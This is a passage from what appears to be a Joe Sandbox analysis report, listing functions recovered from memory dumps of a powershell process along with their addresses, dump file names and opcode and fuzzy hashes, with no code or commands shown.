                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5ad2c7550162cc0ecd2cfb0371f2ffc530f3ce5399df4bd4bcf09bf52db1125d
                                                                                            • Instruction ID: f0d94d9b3faa9699771e7876fb55163a9971a9309d4689d9dea94e5aad06a91a
                                                                                            • Opcode Fuzzy Hash: 5ad2c7550162cc0ecd2cfb0371f2ffc530f3ce5399df4bd4bcf09bf52db1125d
                                                                                            • Instruction Fuzzy Hash: 35414974A00609CFCB05DF59C5949AEFBB2FF48314B158699D906AB366C732FC51CBA0
                                                                                            Function 0719650C Relevance: .1, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15086f1210ec26840a01db154768cdbdbe3cc9377adb5bd08c45189eb9df5cd9
                                                                                            • Instruction ID: 8a5bb19140cc368d9a188fe3986c48203928486b9a23b693ea714038b244af02
                                                                                            • Opcode Fuzzy Hash: 15086f1210ec26840a01db154768cdbdbe3cc9377adb5bd08c45189eb9df5cd9
                                                                                            • Instruction Fuzzy Hash: 083158B2700211DBDF259E6D94117BABBB29FC1291F14843AD502CB6C5EF76C942C7B1
                                                                                            Function 07194DB8 Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 24fa25c7219be358f93e96fe1fc37e99eeb94cb0ca8e0a1afc3184a9482f5e23
                                                                                            • Instruction ID: b8e67fb6d3fe9763596613467e03b7ed57ad4c18439dc6b4a07ed64af82d89a6
                                                                                            • Opcode Fuzzy Hash: 24fa25c7219be358f93e96fe1fc37e99eeb94cb0ca8e0a1afc3184a9482f5e23
                                                                                            • Instruction Fuzzy Hash: BE316F70B40214DFE714ABA8C855FAF7AA3AFC5740F14C024E9016F395DFB5AC428B92
                                                                                            Function 07191100 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ace5173dcae1f8227687711efbdab3f5f1e44fb291caea55876a345d1ac47708
                                                                                            • Instruction ID: b24c90b6b6c19e684ce3af3e7727104391b89c6dbf5b450031df83eacc3a40ce
                                                                                            • Opcode Fuzzy Hash: ace5173dcae1f8227687711efbdab3f5f1e44fb291caea55876a345d1ac47708
                                                                                            • Instruction Fuzzy Hash: F92157B170020BFBEF2455794800B76769A9BC1650F24803B9505CB3C5DF75C8829361
                                                                                            Function 07190FD0 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 349e2248ab4a57be871206d38dac3688bf76be887d695f3bfae6d94b4f783097
                                                                                            • Instruction ID: 22e3e2ce7ee5a9c009b37b2da8566e063eacddc9a08b71077e971a2e86cd164f
                                                                                            • Opcode Fuzzy Hash: 349e2248ab4a57be871206d38dac3688bf76be887d695f3bfae6d94b4f783097
                                                                                            • Instruction Fuzzy Hash: 0A218B7270035BA7DF685A7A4810B3AB6869BC5701F38C43AD506CB3C5DF77C88293A1
                                                                                            Function 07190FB4 Relevance: .1, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fa6d59c4647d8902f0ae09548d01dbf299ad83d6a2271c185d8f765c26b40d14
                                                                                            • Instruction ID: d1b8fcfc99dbc0b8013e27fde92f2aef1145ed9f100e0b2e875c4f6820b16fc2
                                                                                            • Opcode Fuzzy Hash: fa6d59c4647d8902f0ae09548d01dbf299ad83d6a2271c185d8f765c26b40d14
                                                                                            • Instruction Fuzzy Hash: 3A217C767043DBBBDF660A3648107767FA69F87610F3C806AD541DB2C6DA6AC881C362
                                                                                            Function 071910E4 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9957fab34bea3492a8718ba638fbc8c0238d62c899808a8317fbcd3388dd4a93
                                                                                            • Instruction ID: 8a8de77c880db8706576b4b10315966e0ba1e3bd29a7e8bd3ffcfc0905f203f6
                                                                                            • Opcode Fuzzy Hash: 9957fab34bea3492a8718ba638fbc8c0238d62c899808a8317fbcd3388dd4a93
                                                                                            • Instruction Fuzzy Hash: B12138B134538BFBEF2205354800BA27FA64F83650F284577E980CA2C6D769C886D326
                                                                                            Function 08F83D37 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532299871.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6ee9e4c218a5310956ea169252153d9cb37d26a131c3d819708bdb3ff409fba
                                                                                            • Instruction ID: 0fc3267f00e7100b5c7b488d7ba540f492576d459e215f97b376972a79bf6429
                                                                                            • Opcode Fuzzy Hash: d6ee9e4c218a5310956ea169252153d9cb37d26a131c3d819708bdb3ff409fba
                                                                                            • Instruction Fuzzy Hash: 04218B33F04149CBEB29B6B4E8511AAF7A6ABD5522F10807FC5918B366DE31840A8752
                                                                                            Function 0719657C Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 30bcb6eb53a994ecaa2f7441098a34e32d00e9699ef60b6e002af3e9771c1590
                                                                                            • Instruction ID: 453acd92a40090338d50d7b0c81955eb264dc5ec72cd7f272c3d5f166c566024
                                                                                            • Opcode Fuzzy Hash: 30bcb6eb53a994ecaa2f7441098a34e32d00e9699ef60b6e002af3e9771c1590
                                                                                            • Instruction Fuzzy Hash: B61138F1704342AFEF158E2444117B57B729BC26D0F1881B9E9018B2C9EF39D942C3B2
                                                                                            Function 04769597 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 32688546dd1df1032839263a0e145092661a889041b0a46e542ce408f8b47145
                                                                                            • Instruction ID: 4048b5c786a77c59b43692e76639f9b2298a22d02014111b809d1ece926c1658
                                                                                            • Opcode Fuzzy Hash: 32688546dd1df1032839263a0e145092661a889041b0a46e542ce408f8b47145
                                                                                            • Instruction Fuzzy Hash: DD21EAB4A04209DFCB00DF99D9819AEFBB5FF89310B1581A5E909A7352C731FD51CBA1
                                                                                            Function 0476EC38 Relevance: .1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2d6f526afc32e5143276bdb3f38eea8a2dbe66dde756472d828ba5bf2f75bf4f
                                                                                            • Instruction ID: e6b4503df4eccccdeefb8e116d8759b1c66c7678ef12f35791617c0735e031eb
                                                                                            • Opcode Fuzzy Hash: 2d6f526afc32e5143276bdb3f38eea8a2dbe66dde756472d828ba5bf2f75bf4f
                                                                                            • Instruction Fuzzy Hash: 200145313493802FD31A9236AC11B9A3F27DFC7610F0884BBE5468F297C894AD0C83E2
                                                                                            Function 0097F2FB Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511008080.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_97d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                                            • Instruction ID: 943065b345aaa9f08697b06486cd95d2f267164f241d68be46774dde368b3c18
                                                                                            • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                                            • Instruction Fuzzy Hash: 6B219D76504240DFCF06CF10D9D4B16BF72FB88314F24C5A9E9494A666C33AD86ACFA1
                                                                                            Function 0097D01D Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511008080.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_97d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 373010cd1f642144c429a2d1516618c271a9fbb87f868d31aa2fc27f528a904f
                                                                                            • Instruction ID: 4b8a587aa2cd24168543e43b45558f697ac078d5850d304ef95f58cbd876467f
                                                                                            • Opcode Fuzzy Hash: 373010cd1f642144c429a2d1516618c271a9fbb87f868d31aa2fc27f528a904f
                                                                                            • Instruction Fuzzy Hash: F101F272406340DAE7204A25C980B66BFACDF81374F18D51AED4C0E242C6B89941C6B1
                                                                                            Function 0476EC48 Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bc15d62f6d3bb67572c69551cfd1756d63063ae68f93deabbd342018bcab5991
                                                                                            • Instruction ID: b2ba194e4228a155ce076972c7322ebc167dfccf6737c8296e70805deb7ce5b4
                                                                                            • Opcode Fuzzy Hash: bc15d62f6d3bb67572c69551cfd1756d63063ae68f93deabbd342018bcab5991
                                                                                            • Instruction Fuzzy Hash: 3DF0243130030027D21CA636AC51F9F7B5BEFC9B10F60883DE10A5B3CACDA1AC095394
                                                                                            Function 0476D59E Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 882a123f53e4431025e2dcb34bfc98ea4a24fc52c09654d57bf7eda6e86546bb
                                                                                            • Instruction ID: 7a3ff4cab21b26f464cc930191c9860c39de5c49192a6806dcdac89b8091bba2
                                                                                            • Opcode Fuzzy Hash: 882a123f53e4431025e2dcb34bfc98ea4a24fc52c09654d57bf7eda6e86546bb
                                                                                            • Instruction Fuzzy Hash: EBF0A9393001109B87096B69A41946E3AA7EFC8622320401EF806CB761CFB89C428BA2
                                                                                            Function 0476F358 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3a85e2d49a84e044303b9dddf025263e993fc54bff67c9742d71f4a981ea24b7
                                                                                            • Instruction ID: 9702ebd764cd762006de068d5aabaef6b84f19c329fecda403a9fd8e28a29f15
                                                                                            • Opcode Fuzzy Hash: 3a85e2d49a84e044303b9dddf025263e993fc54bff67c9742d71f4a981ea24b7
                                                                                            • Instruction Fuzzy Hash: D7F024323011009BDB24263EA4482AE7BEBFBC9350B00853CD40FC7745EFB6AC059782
                                                                                            Function 0476D5A0 Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae8d6a13b732a7ea1a355ec1739f8e5e20137a4f72761fac257b93eaf44eda59
                                                                                            • Instruction ID: be401531b0332d834abccd19fda3c62f4939a1f738ad0e132517553bef299d4b
                                                                                            • Opcode Fuzzy Hash: ae8d6a13b732a7ea1a355ec1739f8e5e20137a4f72761fac257b93eaf44eda59
                                                                                            • Instruction Fuzzy Hash: 07F06D393005109B87096B6DA41842E7AE7EFCC722320441DF906CB361CFB8DC428BA2
                                                                                            Function 0097D01C Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511008080.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_97d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1beaff935afb306936b12bcf5e70c0a0b2dcb7563eebbb10624d3e4ed3d7066a
                                                                                            • Instruction ID: 1ab05b2406f1f8cdcbf8d3f06e1973dde1e0fed5be4f5858e5133ccec70e0b75
                                                                                            • Opcode Fuzzy Hash: 1beaff935afb306936b12bcf5e70c0a0b2dcb7563eebbb10624d3e4ed3d7066a
                                                                                            • Instruction Fuzzy Hash: 0CF0C272406344AEE7108A15C984B62FFACEF91734F18C15AED4C0E282C3799944CBB1
                                                                                            Function 0476F348 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2109d19129761bb6d714af8b98d14f276622e09f0ab71c05c5c31c5469846c4a
                                                                                            • Instruction ID: 02bb3f4dbf5b803995270ad3188e789b76c489fd3a951835604efbcb02cb60f5
                                                                                            • Opcode Fuzzy Hash: 2109d19129761bb6d714af8b98d14f276622e09f0ab71c05c5c31c5469846c4a
                                                                                            • Instruction Fuzzy Hash: 33F027333151015BC7051269A4580AD3F7AEBCB350300812FE40ECB342DF654C0583A1
                                                                                            Function 08F91EDA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4e1d1d825b03896811b1cf5a5a6a08d32ec536a05aad496287b02ef925ef3a2
                                                                                            • Instruction ID: 429478564315da6ebda36f3f80d8e2f081d8a60a6ca291a76cc1fa1383150fb5
                                                                                            • Opcode Fuzzy Hash: b4e1d1d825b03896811b1cf5a5a6a08d32ec536a05aad496287b02ef925ef3a2
                                                                                            • Instruction Fuzzy Hash: 35F01735A00109EFCF05DBDCD9409EDFBB6FF88320B248119EA14A3261C732AD62CB90
                                                                                            Function 04762D35 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 98bc2435c316af04bff905a65c05e515e9dadda31dfc62fb023caef512286ae7
                                                                                            • Instruction ID: 214a8129df7c3f2ba697c271afa313f01ebb8d372c0601909a481e7e8c244124
                                                                                            • Opcode Fuzzy Hash: 98bc2435c316af04bff905a65c05e515e9dadda31dfc62fb023caef512286ae7
                                                                                            • Instruction Fuzzy Hash: 72F0827AA092448FCB41D758D8605ACB7B1DF45324B2881EAC959DB293C727AC47CB21
                                                                                            Function 0476FCFC Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eff371680bf0897f8cc481043974460f849f5c9250917dc436c1851bdb13f45d
                                                                                            • Instruction ID: ff37be006104aaedf73dab0b0dba6bc25fef294fe326cec852863ddfdb7cfd35
                                                                                            • Opcode Fuzzy Hash: eff371680bf0897f8cc481043974460f849f5c9250917dc436c1851bdb13f45d
                                                                                            • Instruction Fuzzy Hash: CFE092317042509BCB0A6774A81C6DE7B5BEFC5729F04442DE40687342DFA459058BD5
                                                                                            Function 0476FAC0 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bbf13030adb2b1bcffb0662584556451f015c07539671b3491ef4fbb91423a7a
                                                                                            • Instruction ID: 9a8300939ff840eb728111c934ce85bfd67a82208fa8199500e40742aae5096f
                                                                                            • Opcode Fuzzy Hash: bbf13030adb2b1bcffb0662584556451f015c07539671b3491ef4fbb91423a7a
                                                                                            • Instruction Fuzzy Hash: FAE0ED708052499FC749AB64FD2A4ED7B39FE02205B0401AEED1652B52EA702D96CF91
                                                                                            Function 04767795 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ead0ad7237fff6f280682d27a4204186afc3ecb80aabceac9c5019d466ff675a
                                                                                            • Instruction ID: 72adf579c24e30247f837e4275e715d112fed16aac784850d32870a02846a6b0
                                                                                            • Opcode Fuzzy Hash: ead0ad7237fff6f280682d27a4204186afc3ecb80aabceac9c5019d466ff675a
                                                                                            • Instruction Fuzzy Hash: FAF01C7070020ADBEB08DBA4C556BAF7BB2AB84344F108518D602AF395CB7869499BC0
                                                                                            Function 0476FD00 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f0ac6013075fa8ed37ee258703dac13e63b46b38d1572c358a5df75e6eca2e3
                                                                                            • Instruction ID: c98662ed6465c5457a0e4e000a22a69d72084263ceae5a3f5f62096c7b81ebe4
                                                                                            • Opcode Fuzzy Hash: 3f0ac6013075fa8ed37ee258703dac13e63b46b38d1572c358a5df75e6eca2e3
                                                                                            • Instruction Fuzzy Hash: BDE0DF3170421087CB092B74A40C2DE7B5BEFC8725F00442DE40A83342CFB859018BD5
                                                                                            Function 0476FB8B Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3a75c731470ce550f46ab8999d042a3fac9e00dc9fd10deff214e8f94d19664a
                                                                                            • Instruction ID: e8996f5f9133958b49af9449260f0f4570c9e90fe287f9d95b4be51bb747bf64
                                                                                            • Opcode Fuzzy Hash: 3a75c731470ce550f46ab8999d042a3fac9e00dc9fd10deff214e8f94d19664a
                                                                                            • Instruction Fuzzy Hash: ABE01A349092089FC715EB74F8194AA7FB6EF46304F141499ED4A97352FA311C45DFD1
                                                                                            Function 0476FAD0 Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6330676a0f26b86f24f7c2cee5085cc1dc2db0f3b20d5adc4854ce01319d0437
                                                                                            • Instruction ID: cd2e6a8824af1a63a492d25518ac6a126d789a79caca127653eebfffc5ecfdff
                                                                                            • Opcode Fuzzy Hash: 6330676a0f26b86f24f7c2cee5085cc1dc2db0f3b20d5adc4854ce01319d0437
                                                                                            • Instruction Fuzzy Hash: 95D06770D0410D8BCB08AFA5F86A4FDBB39EE10201F4041ADE90BA2691EE702996CFD1
                                                                                            Function 0476FB98 Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f4f6937e08d250fa8a4137ae960d2e7ba9cba5a6e986bcf4501c168d9d4a765a
                                                                                            • Instruction ID: d92962158fa5a650c2b3ba9469b6bceeff5aee4390175cadfaf2b350f3663337
                                                                                            • Opcode Fuzzy Hash: f4f6937e08d250fa8a4137ae960d2e7ba9cba5a6e986bcf4501c168d9d4a765a
                                                                                            • Instruction Fuzzy Hash: 55D06234E041098FC744EF65F84646D7BB6EB44301F104559ED0993351EA705C91CFD1
                                                                                            Function 07191CB6 Relevance: .0, Instructions: 5COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c687e3e21a340cfc3a88ca90869d18ea3358a523c266b656e290ddbfe89a8783
                                                                                            • Instruction ID: 75ab5b0708551fed706118ece0c4e454de027490ee5924f7f80805ea7748d4b1
                                                                                            • Opcode Fuzzy Hash: c687e3e21a340cfc3a88ca90869d18ea3358a523c266b656e290ddbfe89a8783
                                                                                            • Instruction Fuzzy Hash: 55A011303002008BC200CA00C882808B320AF82A0AB28C08AA80A8F282CB23E803EB00